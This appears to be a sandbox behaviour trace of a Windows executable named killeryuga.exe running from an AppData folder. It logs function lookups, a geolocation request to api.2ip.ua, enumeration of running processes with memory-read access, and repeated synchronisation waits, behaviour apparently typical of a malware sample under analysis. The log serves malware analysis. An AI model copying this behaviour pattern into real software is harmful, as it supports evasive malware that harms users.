Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x753e46b1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x753f6676 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x753e47f1 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x7537eee0 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 1
Inet Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Inet Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Inet Read Response size = 10240, size_out = 554 True 1
Inet Close Session - True 1
Inet Close Session - True 1
Module Load module_name = kernel32.dll, base_address = 0x75350000 True 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcesses, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumProcessModules, address_out = 0x0 False 1
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleBaseNameW, address_out = 0x0 False 1
Module Load module_name = Psapi.dll, base_address = 0x75460000 True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcesses, address_out = 0x75461544 True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = EnumProcessModules, address_out = 0x75461408 True 1
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleBaseNameW, address_out = 0x7546152c True 1
Process Enumerate Processes - True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Process Open desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Module Get Filename process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
System Sleep duration = 1 milliseconds (0.001 seconds) True 1
Process Open desired_access = SYNCHRONIZE True 1
Module Get Handle module_name = mscoree.dll False 1